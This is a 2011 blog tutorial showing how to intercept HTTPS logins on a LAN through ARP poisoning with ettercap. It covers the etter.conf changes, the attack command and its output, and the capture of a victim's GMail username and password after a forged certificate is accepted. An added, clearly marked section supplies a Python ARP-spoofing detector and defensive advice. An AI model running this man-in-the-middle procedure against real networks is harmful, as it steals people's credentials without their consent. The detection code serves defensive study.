Saturday, May 28, 2011

HOWTO : Sniffing SSL with ettercap on Back|Track 5

*** WARNING : This HOWTO is for educational purposes only. Do NOT carry out the following steps on a LAN without permission. Otherwise, you may end up in jail. ***

Sniffing SSL (https) traffic on a LAN with ettercap by means of a Man In The Middle (MITM) attack.

Step 1 :

nano /etc/etter.conf

Make the following changes :

ec_uid = 0    # nobody is the default
ec_gid = 0    # nobody is the default

Uncomment the following :

# if you use iptables:
redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"
redir_command_off = "iptables -t nat -D PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Step 2 :

Victim's machine is at while the router is at Attacker is at

ettercap -TqM arp:remote / /

The output will look like the following :

ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Dissector "dns" not supported (etter.conf line 72)
Listening on eth0... (Ethernet)

eth0 ->    08:00:27:FF:95:DB

Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Scanning for merged targets (2 hosts)...

* |=================================================>| 100.00 %

2 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : 70:1A:04:FF:0A:9A

GROUP 2 : 00:1E:10:FF:A7:E2
Starting Unified sniffing...

Text only Interface activated...
Hit 'h' for inline help
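Seen from the wire, the ARP poisoning that Step 2 starts is a burst of ARP replies in which one interface (the attacker's, 08:00:27:FF:95:DB above) starts answering for both the gateway's and the victim's IP address. The following detector is an added example, not code from the original post or from ettercap: it replays constructed `tcpdump -n arp` lines and raises an alert whenever an IP address moves to a different MAC, or one MAC answers for several IP addresses. The MAC addresses are the ones printed in the output above; the IP addresses (192.0.2.x) are placeholders, since the post omits them.

```python
"""Flag ARP cache poisoning from a stream of ARP reply records.

Added example (not part of the original post). Input lines use the format
printed by `tcpdump -n arp`, e.g.
  12:00:01.000100 ARP, Reply 192.0.2.1 is-at 70:1a:04:ff:0a:9a, length 28
"""
import re
from collections import defaultdict
from typing import Dict, List, Optional, Set

# Pull "<ip> is-at <mac>" out of a tcpdump ARP reply line; requests are ignored.
ARP_REPLY = re.compile(r"ARP, Reply (\d+\.\d+\.\d+\.\d+) is-at ([0-9A-Fa-f:]{17})")


class ArpMonitor:
    """Tracks the IP -> MAC bindings seen in replies and reports changes."""

    def __init__(self, gateway_ip: Optional[str] = None) -> None:
        self.gateway_ip = gateway_ip
        self.ip_to_mac: Dict[str, str] = {}
        self.mac_to_ips: Dict[str, Set[str]] = defaultdict(set)

    def observe(self, ip: str, mac: str) -> List[str]:
        """Record one reply and return any alerts it triggers."""
        mac = mac.lower()
        alerts: List[str] = []
        prev = self.ip_to_mac.get(ip)
        if prev is not None and prev != mac:
            # The binding flipped. A flip on the default gateway is exactly what
            # an arp:remote MITM looks like, so rate it higher than other hosts.
            level = "CRITICAL" if ip == self.gateway_ip else "WARNING"
            alerts.append(f"{level} {ip} moved from {prev} to {mac}")
            self.mac_to_ips[prev].discard(ip)
        self.ip_to_mac[ip] = mac
        self.mac_to_ips[mac].add(ip)
        claimed = self.mac_to_ips[mac]
        if len(claimed) > 1:
            # One interface answering for several hosts: the poisoner's MAC
            # claims the victim's and the gateway's IP at the same time.
            alerts.append(f"WARNING {mac} now answers for {sorted(claimed)}")
        return alerts


def analyze(lines: List[str], gateway_ip: Optional[str] = None) -> List[str]:
    """Run the monitor over tcpdump lines and collect all alerts in order."""
    mon = ArpMonitor(gateway_ip)
    alerts: List[str] = []
    for line in lines:
        m = ARP_REPLY.search(line)
        if not m:
            continue  # ARP requests and non-ARP lines carry no binding
        alerts.extend(mon.observe(m.group(1), m.group(2)))
    return alerts


# Constructed capture: gateway and victim answer normally, then a third MAC
# (the attacker's interface from the ettercap output) answers for both.
SAMPLE = """\
12:00:01.000000 ARP, Request who-has 192.0.2.1 tell 192.0.2.10, length 28
12:00:01.000100 ARP, Reply 192.0.2.1 is-at 70:1a:04:ff:0a:9a, length 28
12:00:02.000000 ARP, Reply 192.0.2.10 is-at 00:1e:10:ff:a7:e2, length 28
12:00:05.000000 ARP, Reply 192.0.2.1 is-at 08:00:27:ff:95:db, length 28
12:00:05.000100 ARP, Reply 192.0.2.10 is-at 08:00:27:ff:95:db, length 28
""".splitlines()

if __name__ == "__main__":
    for alert in analyze(SAMPLE, gateway_ip="192.0.2.1"):
        print(alert)
```

In practice you would feed it `tcpdump -n -l arp` on a monitoring port, or diff periodic `arp -an` snapshots; the two signals it keys on (gateway MAC change, one MAC for many IPs) are the same ones arpwatch and switch Dynamic ARP Inspection use, and a static ARP entry for the gateway on sensitive hosts removes the first one entirely.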

Step 3 :

At the victim's machine, open a browser such as Firefox and go to GMail. You will be asked to accept an untrusted certificate. Once the certificate is accepted, the browser is directed to the GMail login screen.

When the victim logs in to GMail, his/her username and password will be logged on the attacker's machine. The display will be similar to the following :

HTTP : -> USER: samiux PASS: password INFO:

You will see USER: samiux and PASS: password.

Remarks :

To delete the untrusted certificate in Firefox on the victim's machine : "Edit" -- "Preferences" -- "View Certificate List" -- "Server". You will find something like the following. Just delete them all.

Thawte Consulting (Pty) Ltd. forever 2011-09-21 forever 2011-09-21

In general, GMail will not ask you to accept any certificate, especially an untrusted one, so a prompt like this is itself a sign that the connection is being intercepted.

That's all! See you.